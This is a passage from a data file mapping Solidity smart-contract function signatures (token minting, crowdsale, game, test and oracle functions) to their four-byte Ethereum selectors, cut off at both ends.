"0xbcd3d8ca", "getPot(uint256)": "0x28d3ad3f", "getTicketsCountByBuyer(uint256,address)": "0x305a762a", "getBuyers(uint256,address)": "0x459f93f7", "getSavedString()": "0x812cddf2", "getHashOfBlock(uint256)": "0x8089d001", "test_threeInvalidEqUint()": "0x67653f3b", "_mint(address,uint256)": "0x4e6ec247", "logUint(uint256)": "0x9905b744", "smallUintFunc(uint8,uint256)": "0xdf9abaa0", "_pointToResolverAndResolve(bytes32,address)": "0xfa5ed321", "test_insert_findWithHintNextIncreased()": "0x2123015e", "mintMigrationTokens(address,uint256)": "0x3c0cfb3d", "mintTokens(uint256,address,bool)": "0x8d1dff6b", "internal_tester()": "0x8c7c35b9", "mintAllowance()": "0x396876bd", "testFailMintGuyWhenStopped()": "0xa61e67aa", "viable_print(uint256,uint256,uint64)": "0x000000db", "testToUint(bytes)": "0x0902c6d7", "test_updateKey_decreaseNoHint()": "0xa5c7ac13", "testMintThis()": "0x0af39032", "toUint(string)": "0xc32a6f6d", "test_insert_findWithHintNotTightBound()": "0xfefc8b41", "isGlobalConstraintRegistered(address,int256,address)": "0x4ee4d8fa", "getMeshPointByName(string)": "0x17ce9d68", "getOnMintTargetValue()": "0x8115a2ac", "mint(address,uint256)": "0x40c10f19", "test_fourInvalidEqUint()": "0x3fc523c7", "ChronoMint(address,address,address)": "0x1f96add4", "mint(bytes32)": "0xadf2cead", "mintForReportingParticipant(address,uint256)": "0xa00ce6a5", "MeshPointManager()": "0x73cc9153", "onMint(address,uint256)": "0x0f632fd3", "mintInternal(address,uint256)": "0xd4d92b14", "test_insert_findWithHintNextRemoved()": "0x13d5d4fe", "hintURL(bytes32,string)": "0x02f2008d", "mintAgents(address)": "0x42c1867b", "test_insert_findNoHintUpdateTail()": "0x756a515f", "testUint(uint256)": "0xc7a16965", "intMax()": "0x7b31db17", "test_insert_findWithHintPrevDecreased()": "0xbeacf74f", "setMintAgent(address,bool)": "0x43214675", "mint()": "0x1249c58b", "setConfigUint(bytes32,uint256)": "0x038e7577", "addArgumentToRequestUint(uint256,bytes32,uint256)": "0x7dac9048", "createNameAndPoint(bytes32,address)": "0x65b0bc85", "MintTokens(address,uint256)": "0x7b47457f", "Mint(uint256)": "0x07883703", "removeGlobalConstraintPre(address,int256,address)": "0x144138c8", "test_fourValidEqUint()": "0xe04a1942", "_mintTokens(address,uint256)": "0xe476cb86", "PointlessCoin(uint256,string,uint8,string,address)": "0xec10286d", "mint_and_transfer(address,uint256)": "0x52ec8a58", "getMintForReportingParticipantTargetValue()": "0xcb0d3981", "FooMintToken()": "0xcbbe300b", "registerEndpoint(string)": "0x08b5a85a", "getUint256Max()": "0xbed9588b", "mint(uint128)": "0x69d3e20e", "mint(address,uint256,uint256)": "0x156e29f6", "mintFeeTokens(uint256)": "0xa7eb685b", "setUint(uint256)": "0x4ef65c3b", "mint(address)": "0x6a627842", "setUint(uint256,uint8,uint16,uint32,uint256)": "0x8de2a051", "test_threeValidEqUint()": "0x1f0fd191", "getMeshPointByCreator()": "0xf1dc24ae", "test_twoValidEqUint()": "0xab3860d0", "getInsertPointForNumTokens(address,uint256)": "0xc622afb0", "printMarket()": "0xed129c2d", "setConfigUint(bytes,uint256)": "0x0473e09c", "submitMint(address,uint256)": "0xe78fd9a8", "addMeterpoint(address,int256)": "0xc7d20f82", "updateRausPoint(uint16,int256,uint16)": "0x9029a32b", "test_insert_findNoHintUpdateHead()": "0x332ae26c", "mintTokens1(address,uint256,uint256,bytes32)": "0x8383671b", "mintBonusTokensForGames(uint256)": "0xd740547e", "print(address)": "0x24d427a9", "getUint(bytes32,string)": "0xc3a35825", "addGlobalConstraint(address,int256,bytes32,address)": "0x1e98d54a", "isMint(address)": "0xe17b35ed", "setMockUint256(bytes4,uint256)": "0x1d77d696", "setUint8(uint8,uint8)": "0xd9d958ec", "getResponseUint(uint256,bytes32)": "0xe871614a", "mintReputation(uint256,address,address)": "0xeaf994b2", "testInequalityUint()": "0xa26176b1", "onMintCalled()": "0x3b7dc55e", "setUint256(uint256,uint256)": "0x5bf9755e", "mintTokens(address,uint256)": "0xf0dda65c", "mintTokens(uint256,uint256,address)": "0x75c66e2f", "MeshPoint(string,address)": "0xa4951771", "mintLockCashout(address,uint256)": "0x4acd4d5c", "removeGlobalConstraintPost(address,int256,address)": "0x3e15346d", "mintForReportingParticipant(uint256)": "0xdb054134", "testFailMintWhenStopped()": "0x65b27205", "addDataPoint(uint256,bytes32)": "0xcb758a89", "findEndpointByAddress(address,address)": "0x1fbe7475", "Uint256Oracle(uint256)": "0x0647f697", "mintBadge(address,uint256)": "0xe42bff66", "updateBtsPoint(uint16,int256,uint16)": "0x99352c42", "hint(bytes32,string,bytes20)": "0x2196ae0d", "testMintGuyAuth()": "0xaf941129", "JSONpath_int(string,string,uint256)": "0xb58de1d5", "createMeshPoint(string)": "0x5e956abf", "storageToUint(string)": "0xe2ffe3f3", "mintGrey(address,uint256)": "0xa20efba3", "MintDarioToken(address,int256,uint256)": "0xe7a02352", "findEndpointByAddress(address)": "0x028a582e", "restartPresale()": "0xe5ff7674", "FOUNDERS_REWARD()": "0xf7868884", "getRoyaltyPartners()": "0xe7d0c552", "create_block()": "0x94e47e61", "preSoldSharesDistributed()": "0x680add7b", "giveEthBankRollAddress()": "0x5903f01b", "ICOSaleType()": "0x2eb44efc", "sumHardCapICOStage2()": "0x7f4ed5ac", "patentValidTime()": "0x3463c5c7", "MAX_EXPIRE_DELAY()": "0xeacf7d8a", "priceChanger()": "0x2da0c25c", "canUpdateNextGamePotSplit()": "0x1bc50b05", "poolMintAmount()": "0x7e575524", "lastBlock_f6()": "0x8be8f944", "teamToken2018()": "0x708260b4", "policyFeeCollector()": "0x059c5c4f", "LOOMIA1_ADDR()": "0x902c3ad7", "renamingCostsPerChar()": "0x26e23485", "maxTransferPerTimeframe()": "0xe3cb0cf0", "freezePrice()": "0xec1182c2", "percent_reduction()": "0xc34dd141", "fifthBonusSalesEnds()": "0x356d6b24", "goalCompletedBlock()": "0xbd9b49b7", "ExchangeRate()": "0x4438c8ab", "icoStartedTime()": "0x9762e9ea", "discountDivisor()": "0xecd13b89", "HARD_CAP_USD()": "0x137ce8e3", "grantEnable()": "0xd5969f2b", "CreatorWithdrawAll()": "0x8065eaa6", "currentMineTokenAmount()": "0x272edeac", "deathData_v19()": "0xfa671e5f", "canRenounce()": "0x30231ea4", "STRC_SUPPLY()": "0x7e32456d", "Icostart()": "0xf998393c", "sleepContract()": "0x764c9d32", "TIER5_RATE()": "0x752efafc", "thirdTime()": "0xe00ac9a3", "maxEtherCap()": "0x326fd584", "initialDrop()": "0xb6213490", "noVoteSum()": "0x6b863578", "dailyLimit()": "0x67eeba0c", "minReq()": "0x7c60fa60", "HighJackpotHolder()": "0x21dcbbae", "bountyPart()": "0x704e7437", "CPO()": "0x5dcb98c4", "SALE_ETHER_MIN_CONTRIB()": "0x9a1ca8d2", "Jeopardy()": "0x292ca2fe", "crowdsale_eth_refund()": "0x11c93d03", "votePrice()": "0x860c851a", "crownName()": "0xb975ce23", "betsCloseAt()": "0x6304335b", "NCPPrivate()": "0x9be08a4e", "reservedTokensFounders()": "0xef67caa0", "PRICE_PREBUY()": "0x1dd5301a", "maxCrowdsaleCap()": "0xa8347f6a", "tier2Reached()": "0x5924f811", "isCrowdSale()": "0x1128798f", "widthraw()": "0xaa3ba179", "shopKnife()": "0xf0b25186", "operationsWallet()": "0xfd72e22a", "DIP_TGE()": "0x588100d4", "WAITING_TIME()": "0x4d2b1444", "getTimePassed()": "0x64921844", "deadline_status()": "0xdfb4b2f0", "credosReserveAccount()": "0x7c8e4e25", "grantAt()": "0xc6e6b803", "lastEpochBlock()": "0xc2362dd5", "clockAuctionStorage()": "0x2f798500", "hodlerTime3M()": "0x4a48314f", "main_sale()": "0x1856c1dc", "deathData_f1()": "0x7e59d513", "maxAuditDuration()": "0xa7c1a75b", "teamd()": "0x629d0f2f", "DEVELOPER2()": "0x60e393c6", "totalTokenSales()": "0xe82c6e7b", "totalpaidout()": "0x6c3772fd", "createTime()": "0x61dcd7ab", "energyContract()": "0x3992b494", "StgFourbonusEnds()": "0xa5b87ef7", "icoStage1Deadline()": "0x735b266d", "ThreeDLTokenDeposit()": "0x34c39d1c", "depositCreator()": "0x3a8b069e", "DATE_31_DEC_2020()": "0x4a6aac33", "unitsUserCanBuyLimitEth()": "0xc47d5bb8", "endLock()": "0x077e6334", "collectorsCount()": "0x282ef05c", "subBrokerNum()": "0x6341b3fe", "LOCK_TIME()": "0x413d9c3a", "EARLYADOPTERS()": "0xe50e2f65", "releaseState4()": "0x90fd4300", "tier3End()": "0xd6c5a41e", "picosSold()": "0x78af5058", "disableDonation()": "0xaf45de05", "oneEth()": "0x09a8d3f5", "nMsg()": "0x4251ecb4", "tokensForOneEth()": "0x3829dd22", "box1Star5()": "0xea14bc11", "getContractEtherBalance()": "0x30e76dae", "preSaleCoinCap()": "0xf5cce54d", "nextBoundaryAmount()": "0xf07255e3", "isValid(address,uint256)": "0x59647984", "isValidTenant(string,address,uint256)": "0x8ee833cc", "setTenant(bytes32,address,uint256,string)": "0x48d7de63", "winningOption()": "0x9fde4ef8", "weightedVoteCountsOf(uint256)": "0xb54c71eb", "weightOf(address)": "0xdd4bc101", "ballotOf(address)": "0xdc012626", "STSTEST6()": "0xd11bee0f", "YaoToken(uint256,string,string)": "0xd781d0f4", "World2()": "0xf57ac2df", "setEtherPriceManually(uint256)": "0x350896f7", "hashEIP712Message(bytes32)": "0x26602470", "SurgeTestToken()": "0x9ff7422d", "Supply()": "0xee07bf22", "WorldToken()": "0x8a13aa4f", "claimToken(uint256)": "0xa9e7c2e5", "getBalance(address,uint256)": "0x2b04e840", "tokenTransferVIP(address,uint256)": "0x7010129a", "batchTransferVIP(address[],uint256[])": "0xac8aa236", "tokenTransfer(address,uint256,uint256)": "0xcd2f7357", "batchTransfer(address[],uint256,uint256[])": "0x05fcd234", "airdropToken(address[],uint256)": "0xf7d5e485", "VTestDistribution(address,uint256,uint256)": "0x001ab993", "VTest()": "0x4db53a70", "callKoikeToken(address,address,uint256)": "0x7ee26b2e", "NewSouth21Token()": "0x3dd5e0ec", "avatar(address,bytes)": "0xa4e4a7bb", "store(address,bytes)": "0x151c3b12", "price(address,uint256)": "0xad9b8024", "about(address)": "0xe67f3cde", "toggle(address)": "0x588f9acc", "create(address,uint256,bytes)": "0x696c9c0a", "asset(uint256,bytes)": "0x36e0e824", "LUYOCrowdsale()": "0xbe22f6aa", "UntungWaluyo()": "0x51971109", "NewWorld()": "0xcbb105d6", "WildFurToken()": "0x03145ac2", "genEthsRec(uint256,uint256)": "0xbadfedf2", "genKeysRec(uint256,uint256)": "0xc34de22d", "clearAndDestoryAfterTwoWeeks()": "0xa218d8ca", "withdrawCommunityBalance()": "0xfc67af2d", "setCommunityAddress(address)": "0xf7ce4479", "parseUserInivte(uint256,uint256)": "0x94658690", "buyXaddrWithInviteCode(address,uint256)": "0xaac2c717", "getSecondsTimeLockedByTx(uint256)": "0xfa67ba6f", "getSecondsTimeLockedByString(string)": "0x1ebde78b", "getSecondsTimeLocked(bytes4)": "0xf609bf42", "removeCustomTimeLock(string)": "0x64df19da", "changeCustomTimeLock(string,uint256)": "0xa2035fef", "changeDefaultTimeLock(uint256)": "0x98257d84", "verify_signature(bytes32,uint8,bytes32,bytes32,address,address)": "0x3c552556", "getMostVotedOptions()": "0xbf24a794", "JVToken(address,address,address,uint256)": "0x234f1eb6", "_isSoldOut()": "0x845dcc2b", "Michael1011Token()": "0xac5b3dbb", "getten(string)": "0x0e476e27", "endGame(address,bytes)": "0x07a1ca5f", "closeGame(bytes,address,uint256,uint256[],bytes,bytes)": "0x83a287dd", "startGame(bytes,address,uint256,uint256[],bytes)": "0xa26efcf8", "getItem(address)": "0x14d8c981", "generateRnd(bytes,uint256,uint256)": "0xb5a4a146", "initNewPlayer(address,bytes)": "0x74a7d6b9", "getWilds(address)": "0x95655f04", "getInventory(address)": "0x8b87c544", "ownerMint(address,uint256)": "0x484b973c", "overStakeAgeBurn()": "0xd5762230", "arrayIndexOf(address[],address,address)": "0x6acd58d4", "requestTokens()": "0x359cf2b7", "transfer(address,address,address,address[],uint256)": "0xa77beea1", "NGA()": "0x35b3ee0e", "reveal(bytes32,address)": "0xad487790", "devAllocateTokenInMinutes(address,uint256,uint256)": "0xcaa0f0af", "GraybuxToken()": "0xb7e82526", "LukSevenToken()": "0x61ba228b", "isTransferAllowedadv()": "0x5bf0cb1f", "isTransferAllowedteam()": "0xe883429a", "starttime()": "0x8da58897", "allocateAdvisorTokens()": "0x6eec3db6", "allocateTCLRinTeamTokens()": "0x804c68aa", "TCLRToken()": "0xd6d1b8bb", "SunnyX()": "0xbea51ec2", "denemekontrat()": "0xcb421a21", "reward(address,bytes32,uint256)": "0xf11d5b33", "FeeToken()": "0x481531e9", "ZyPPACrowdsale(uint256,uint256,uint256)": "0xd27a6f28", "LupeShares(address,address)": "0xbf7ba12a", "FINALSTSTEST()": "0xc971aade", "ttToken()": "0xb7f63665", "BCAClubCoin(uint256,string,string)": "0xeb74fa0b", "briqcoin()": "0xf593efec", "changeBubbleWallet(address)": "0xa9a26902", "releaseBubToken()": "0xcc1423bf", "calculateObtainedBUB(uint256)": "0x1f468245", "MYCOIN()": "0x91878995", "incrementNonce(address)": "0xf5743c4c", "getNextNonce()": "0xbd7084b2", "AutoChainToken()": "0xc7d044be", "loikikdi()": "0x7b7b81c5", "Fleuth()": "0xbda1f35e", "taxTo(address)": "0xfabee62d", "becomeCoowner()": "0xb5444ef2", "unpauseContract()": "0xb33712c5", "getWordIndex(string)": "0xa1b40946", "setFeeAddress(address)": "0x8705fcd4", "getPrevRoundWinnerCount()": "0x84491566", "getPrevRoundWinner(uint256)": "0x7cf52f3c", "bid(string)": "0x7aef951c", "getProfits(address)": "0x78df0fe1", "feedTweet(uint256,uint256,string)": "0x787dbaf1", "prevRoundTweetId()": "0x73f440fe", "delWord(string)": "0x72ccd03a", "coownerPrice()": "0x6efbd610", "getBestBidder(uint256)": "0x6ac68f7f", "getBank()": "0x60d704db", "addWord(string)": "0x4974da81", "getPotentialProfit(address,string)": "0x45b581a2", "pauseContract()": "0x439766ce", "getWord(uint256)": "0x43503fac", "feeAddress()": "0x41275358", "feeCoownerAddress()": "0x3a3bc0cb", "prevTweetTime()": "0x300ba0ec", "feedAddress()": "0x29c36bb5", "getWordCount()": "0x0ce5a098", "ValidateEventStorage(bytes,bytes)": "0x9f1cda42", "StoreBytes(bytes)": "0xa8a77984", "TestDividendFund()": "0xb8f2690d", "withdrawDividends()": "0x2e92abdd", "myDividendBalance()": "0x260ea6c9", "insertShareholder(address)": "0xe7f18249", "evaluateShareholders(address,address)": "0x6542fed7", "sweepUnallocatedDividends()": "0xa4439890", "payDividends()": "0xde88a342", "addDividends(uint256)": "0xd5a683c0", "parseBlockHeader(bytes)": "0x849d926b", "withdrawTokenBalance(uint256)": "0x88a525c4", "claimDividendsForBlock(uint256)": "0x8e0d5075", "handleBlockBalanceLedger(address,uint256,uint256)": "0x28046f30", "handlePayableSharesDelta(uint256,uint256)": "0x89e2d8bb", "SweepBalances()": "0x1a470b6a", "DividendToken()": "0xe76ed0e3", "UsingANormalStruct()": "0xe9482aa6", "LogBetProperties(uint256)": "0x8e7fdc6c", "PlaceADiceBet(uint8)": "0x4028354b", "Register()": "0x19e5bf3a", "UsingAVirtualStruct()": "0x0db75ab9", "SetWageredWei(bytes32,uint256)": "0x51d74ce5", "GetWageredWei(bytes32)": "0x0e67cf6c", "SetDidPayOut(bytes32,bool)": "0x898c94b7", "GetDidPayOut(bytes32)": "0x578d52b6", "SetWagerData(bytes32,bytes15)": "0x2365ceb3", "GetWagerData(bytes32)": "0x3d6bcaef", "GetType(bytes32)": "0x63cd44c9", "SetRevealBlock(bytes32,uint32)": "0x64362587", "GetRevealBlock(bytes32)": "0x750a687c", "SetPlayerID(bytes32,uint16)": "0xb37681fd", "GetPlayerID(bytes32)": "0x95005b8b", "SetProperty(bytes32,uint256,uint256,uint256)": "0xcb4717b2", "GetProperty(bytes32,uint256,uint256)": "0xe8c3e34d", "push(uint256,bytes32)": "0x82fa3421", "publish(uint256,bytes32)": "0xc5a2d352", "deploy(bytes)": "0x00774360", "get_firstbytes(bytes,address)": "0x975b123e", "get_oo_of(address)": "0xc5e08ba9", "get_owner_of(address)": "0x0a91f2a5", "get_allowance_expires(address,address)": "0xf838b0e9", "get_mintable()": "0xf42598f0", "transfer_other(address,address,uint256)": "0xca607c4e", "claim_ENS_name()": "0x6c8dea3b", "get_default_approval_duration()": "0x64f8ad1f", "mint_and_transfer(int256,address,uint256)": "0xb3dcc5eb", "set_default_approval_duration(uint256)": "0x320e6c01", "approve_timed(address,uint256,uint256)": "0x31ef916a", "free(uint256)": "0xd8ccd0f3", "freeUpTo(uint256)": "0x6366b936", "freeFrom(address,uint256)": "0x5f2e2b45", "freeFromUpTo(address,uint256)": "0x079d229f", "confirm(bytes32,uint8,bytes32,bytes32)": "0xb00606a5", "setup(uint256,uint256,uint256,address,uint256,uint256,string,address,address)": "0xe7b7c2a6", "setup(bytes32,address,address)": "0xae4d1af6", "dive5(address)": "0x90de4495", "dive4(address)": "0x8dad52f4", "dive3(address)": "0xcc7cddb8", "dive2(address)": "0xb3b5eaa3", "dive1(address)": "0xd8149fe7", "RequestFactory(address,address,address)": "0x9e86f8c5", "to_binary(uint256)": "0xc9c538aa", "concat(bytes,bytes1,bytes,bytes1)": "0x1d1a7c32", "toAlphabet(uint8[])": "0xd76f94aa", "reverse(uint8[])": "0xf13d111f", "truncate(uint8[],uint8)": "0x7e0cfc3d", "toBytes(bytes32)": "0x326cf61c", "lengthEncode(uint256)": "0x00cc15b0", "toBase58(bytes)": "0xb500cc08", "verifyHash(string,string)": "0x258b85d4", "generateHash(string)": "0xb063152a", "KillSwitch()": "0xc7c8b07b", "TimestampScheduler(address,address,address)": "0x6e120023", "BlockScheduler(address,address,address)": "0xcd31037c", "validate(address[5],address,uint256[12],uint256,bytes,uint256)": "0x57635dc1", "initialize(address[5],address,uint256[12],uint256,bytes)": "0xc8b413ad", "getproductprices()": "0x877c3650", "getproduuct(uint256)": "0x1e7d84cb", "updateprice(uint256,uint256)": "0x6d9af813", "addproduct(string,string,uint256,string)": "0xc188f44b", "getBuyerbyaddress(address,address)": "0xfc800df4", "registerBuyer(string,string,string,string,address,string)": "0x0f4bbdf2", "FearOfMissingOut()": "0x636822fa", "Pothereum(uint256,string,string)": "0xb3965083", "MB(address,address,address,address,address)": "0xd2c87b02", "getMaxAmountToWager(uint256)": "0x30e07be0", "getMinAmountToWager(uint256)": "0x10745f7e", "getSpinsContainer(bytes32)": "0x0ed387c1", "setConfiguration(uint256[],uint256[])": "0xbf9a5fde", "sendPayout(bytes32,uint256)": "0x267177eb", "executeSpins(bytes32,bytes)": "0x18054275", "buySpins(uint256)": "0x0dd3fd03", "isValidSize(uint256)": "0xa733f702", "changeHouse(address)": "0xf9153fbc", "stop_or_resume_Contract(bool)": "0x1b0eaf78", "HouseManaged()": "0xd0cac952", "setSafeGas(uint256)": "0xdbf5b91b", "external_oraclize_randomDS_proofVerify(bytes,bytes32,bytes,string)": "0xc629061d", "external_oraclize_randomDS_setCommitment(bytes32,bytes32)": "0x96fe6e74", "processPendingTickets()": "0x8864a5fd", "closeRefund()": "0xc493afcf", "scheduledTopUp()": "0x9e208922", "lowerLimitForToday()": "0xf4c28ea3", "DeCenterToken(address,address,address,uint256,uint256)": "0xbc71b0a6", "setCTime(uint256)": "0xe820ce4a", "popQueue()": "0x3ea89fd1", "peekQueue()": "0x53c64fbc", "queue()": "0xe10d29ee", "queueSize()": "0xbae6c2ad", "Panel()": "0x36c28466", "getMyDragons()": "0x2c873761", "claimFreeDragon()": "0x3009bc01", "Gruptecoin()": "0x66fe825a", "CryptoCityToken()": "0xb5d347ed", "lift_ban()": "0x6f3be1da", "CEC()": "0xd0e4713d", "allownce(address,address)": "0xa20bc7fe", "_createItem(string,address,uint256,bytes32,address,address)": "0x74294070", "purchase(uint256,bytes32)": "0x88888f61", "createContractItem(string,bytes32,address,address)": "0x53e551ff", "CryptoPepeMarketToken()": "0x939a8dc1", "Remyt()": "0x6a4fcddb", "SkillCoin()": "0x89400fcc", "XfStandardToken(uint256,string,uint8,string)": "0x608d670a", "Kcoin()": "0xd409a12c", "CLXToken(uint256,string,string)": "0xc11bf8d6", "ViewCoin()": "0x9844613e", "XCTToken()": "0x2fc84de8", "NUMUS()": "0x3764cf3f", "createKingdom(string,string,uint256,bool)": "0xccce6458", "AIBITTECH()": "0xd39502bb", "TokenBurner()": "0x20a60ace", "AllSpringChainToken()": "0xa54527d5", "GlobalEnergyDigitalChain()": "0x12599d3f", "BitGuildCrowdsale(uint256,uint256,address,address,address)": "0x05b67c8e", "whitelistAddress(address[],bool)": "0xaae99c66", "BitGuildWhitelist()": "0xad0254a6", "BitGuildToken()": "0x0676bde3", "MIC(uint256,string,string)": "0x3f001dd7", "setCrowdSaleStatus(bool)": "0x7910830a", "transferLOT()": "0x5967dee8", "redeemBonusLot()": "0x5fccf40a", "EtheraffleICO()": "0x8f679b2d", "XIOToken()": "0x26c4b863", "sendMessage(bytes,bytes,bytes,bytes)": "0x0984f0c1", "getCurrentRoundIssued()": "0x37d05434", "getCurrentRoundMinimumTime()": "0x7b6f5a4c", "getCurrentRoundIsActive()": "0xad381cb7", "getCurrentRoundIsFinished()": "0x71b397cf", "JTBlockchain()": "0x202bb36d", "SEXYCOIN()": "0x381c215f", "IvyKoinContract()": "0xca0a992e", "setNewGreeting(string)": "0x48fefed2", "getWinnersIndex(uint256)": "0xdd215410", "startRound(uint256,uint256)": "0xc3964372", "getUniqHash()": "0x6b0cba9c", "startSettlementProcess()": "0x8a6158f7", "setMinimalBet(uint256)": "0x3ac8858b", "safeguard()": "0xb57dbdc6", "BitplusToken(uint256,uint256)": "0xbe5308ea", "PardiICO()": "0x5ea8cf00", "buyChamp(uint256)": "0x4f72e1c3", "setChampForSale(uint256,uint256)": "0xef2d44c3", "giveChamp(address,uint256)": "0x5e1d832d", "cancelChampSale(uint256)": "0x4a800b98", "transferChamp(address,address,uint256)": "0x27d1c3a6", "getChampsForSale()": "0x46d6b1e8", "_getPoints(uint256)": "0x7f44fcfa", "subDefence(uint256,uint256)": "0x88c058a5", "subAttack(uint256,uint256)": "0xdec4b436", "getChampStats(uint256)": "0x44f06bc7", "forgeItems(uint256,uint256)": "0x41d9cc43", "buyItem(uint256)": "0xe7fb74c7", "setItemForSale(uint256,uint256)": "0xacf50f55", "cancelItemSale(uint256)": "0xbfc38592", "transferItem(address,address,uint256)": "0x6295c61a", "profitSharing(address,string)": "0x9b786d68", "getSeniorContract()": "0x1b561fe7", "getCmcAddress()": "0x0f953b97", "withdrawCoinExt(uint256)": "0xa79f7412", "DigixbotEthereum(address)": "0x4e61df06", "SNTMock(address)": "0xcf3d29ea", "MeetupContract(string,string,uint256,uint256,uint256)": "0x9bc61d06", "confirmDelivery()": "0x5e10177b", "confirmPayment()": "0x62ef1f81", "initiateContract()": "0xb778809b", "Escrow(address,address,uint256)": "0x812c3251", "updateTransfer(uint64,uint256,bytes32,bytes32,bytes)": "0x27d120fe", "close(uint64,uint256,bytes32,bytes32,bytes)": "0x5e1fc56e", "_emitContractRemoved(address,address)": "0x4aecf91d", "_emitContractAdded(address,address)": "0x7a827634", "emitContractRemoved(address,address)": "0x7a40618d", "emitContractAdded(address,address)": "0xa0afebbc", "removeContract(address,address)": "0xde0f725d", "addContract(address,address)": "0xb9858a28", "getContract(uint256)": "0x6ebc8c86", "getContracts()": "0xc3a2a93a", "includes(address)": "0x1aedefda", "killInstance(address,address)": "0x0fcd1cab", "getInvoiceHashAddresses()": "0xa51bb77a", "getCompletedTransactions()": "0xae5a9d17", "getPendingTransactionsSellerAddresses()": "0xdea97078", "generateInstance(address[2],bytes,bytes32[2],uint256[3],bytes32[3],bytes,bytes)": "0x5319ae10", "extractEther()": "0x9fee597b", "testThrowOnTransferWhenNotCreator()": "0xb11888d6", "shouldThrowOnAttemptToTransferWhenNotOwner()": "0x98419ec5", "testThrowOnTransferToNullAddress()": "0x832b0dc3", "shouldThrowOnAttemptToTransferToNullAddress()": "0xc0f8de32", "testTransferCreator()": "0x84f10c35", "isApprovedOnceFor(address,address)": "0x181670e6", "b2s(bytes)": "0x45414df1", "oraclize_setNetwork()": "0xc00d5305", "getCON()": "0x9201ac94", "getOAR()": "0xdc88e838", "proofStorage_IPFS()": "0x7d320ef8", "proofType_TLSNotary()": "0x9dcf56b4", "proofType_NONE()": "0x4315f545", "testUnsyncedRate()": "0xbda2aa53", "testRegularBuy()": "0x177378f0", "testPresaleRefund()": "0x67e6bf06", "testHitPresaleCapPresale()": "0x82dced63", "testHitSoftCapPresale()": "0xc8750d8a", "testLowestTranch()": "0x2fa3a41e", "testMiddleTranchNotExact()": "0xddcd887b", "testMiddleTranch()": "0x31836cb9", "testHighestTranchNotExact()": "0xd9a5b0a7", "testHighestTranch()": "0xf3a5950e", "testFailHitPresaleCapPreDistribute()": "0x3ab89b78", "testHitPresaleCapPreDistribute()": "0xcab54df1", "testHitSoftCapPreDistribute()": "0x567a0f35", "testFailPreDistribute()": "0x4448604b", "testPreDistribute()": "0xde1c977a", "testFailAppendTranch()": "0x973cbc75", "testAppendTranch()": "0xce1d6ea0", "testSetPresale()": "0x289cb681", "TestableTwoStageSale(bytes32,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address,uint256,uint256,uint256)": "0x7ef81a34", "testFailBuyAfterClose()": "0xb140bee5", "testFailStartTooEarly()": "0x63891019", "testFailHardLimit()": "0x04f88d71", "testFailSoftLimit()": "0x926994e6", "testFailTransferBeforeFinalize()": "0x08e2cd00", "testBuyExceedHardLimit()": "0x7e29dad0", "testTransferAfterFinalize()": "0x15fe3b6c", "testTokenOwnershipAfterFinalize()": "0xac9a6515", "testFinalize()": "0x8d92c187", "testHitSoftCap()": "0xd1e9f75b", "testPostpone()": "0xbff04d6f", "testBuyManyTimes()": "0xee67fcda", "testClaimTokens()": "0x6e7c77b6", "testPublicBuy()": "0x81e75dd0", "testOwnerToken()": "0x1861e523", "testSaleToken()": "0xd9a3c199", "addTime(uint256)": "0x0502ca6b", "TestableStandardSale(bytes32,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x69dfc66e", "doStop()": "0x624f011d", "doBuy(uint256)": "0xfb7c0a3f", "Recovery(address)": "0xe7542782", "finalizeDispute()": "0xec77537b", "ContractFullfilled(address,int256)": "0xdbcf0531", "createNewFreelanceContract(string)": "0x44e2024f", "getActiveContracts()": "0x022edd35", "BlocklanceContractHolder()": "0xb270b209", "getMyGames()": "0x0210d751", "getCurrentGames()": "0x326fac6e", "getLetter(uint256)": "0x96e583a9", "winner(uint256,uint256)": "0xb47deb3c", "moves(address,uint256,uint256)": "0xc5d456d6", "checkWins(uint256,uint256,uint256)": "0x73c107b3", "TTT()": "0x19022f20", "fillBlank()": "0x5a4c07a0", "ProvePrivKey(bytes32,uint8,bytes32,bytes32,bytes32,bytes32,address,uint256)": "0x5678494f", "CommitSolutionHash(bytes32)": "0xd97fc929", "toBytes(address)": "0x593b79fe", "get_commit_no()": "0x77ad619d", "get_solution()": "0x51a1c192", "PayForPrivKey(address)": "0x9fe03c59", "privateMin()": "0x9bfa835b", "CLAIM_AMOUNT_ETH()": "0xc90c205b", "lunyrPercentOfTotal()": "0x2e4c4a9f", "dteamVaultAddr1()": "0x5cec2054", "tier5Time()": "0x887e22b1", "MAX_BID_FRAC_BOT()": "0x1bc44213", "firstPreSaleDate()": "0x26458beb", "lastSellPrice()": "0x8c663229", "GEN0_MINIMAL_PRICE()": "0x68f2d6e2", "TOKEN_SOFT_CAP()": "0x39a5a400", "investorsBalance()": "0x454d3e24", "canUpdateNextGameInitalMinBetSize()": "0xcf112453", "PHOENIX_CORSAIR_MAX_CARGO()": "0x8e694807", "addressCEO()": "0x4a1df335", "secondRefundRoundFinishTimestamp()": "0xb44ef712", "tokensWithdrawn()": "0x497fb5b9", "teamTransferFreeze()": "0x87a01164", "startTimeIco()": "0x3b6ea083", "MAX_FREE_REFERRAL_PACKS()": "0xf6f91737", "wavesGW()": "0xbeb9c90d", "TOKEN_BUSINESS()": "0xc24dec82", "tierThreeRate()": "0x0230d870", "preIcoStartAt()": "0x2cb86824", "MAGNITUDE()": "0x6d3036a7", "claimController()": "0xdaddff33", "pizzaPrice()": "0x924720bd", "cardPrice()": "0xde34bacd", "ORIGIN_ETH_BRT_RATIO()": "0xf1a6ed46", "reserveIAMDestination()": "0x46fe2edb", "stopOperation()": "0xb8121385", "WeiRaised()": "0x19af1bd9", "exchangePlayerTokenCount()": "0x76f4d8ad", "totalEthFundCollected()": "0x7ff276bd", "publicSell()": "0xb4929d4c", "isDistributed()": "0xf677cf0d", "levelEndDate()": "0xcabe2c0a", "icoTarget()": "0x16164b33", "TOTAL_SHIP()": "0x69810d0c", "rateboc()": "0x8f5f657d", "lastBlock_a14Hash_uint256()": "0xd5456bc6", "migrateSet()": "0xd4eb139d", "rektCoinCashSafe()": "0x93a00d27", "maxInvestmentICO()": "0xe08d28d3", "presaleEndsAt()": "0x6a4a39e9", "Million()": "0xbcfb4ea1", "totalPublicFundingSupply()": "0x3fe9f2b2", "finishedSTOMinting()": "0x21937192", "hasModerator()": "0xaed362c1", "FOUNDER_WALET()": "0x412c7dfb", "supporter()": "0xa3c1954e", "maxmoneypercent()": "0x3b5e295c", "changePhaseToNormalLife()": "0x4dabb674", "founderTokenCount()": "0x73a1f366", "tokenPriceInETH()": "0x652ebb4c", 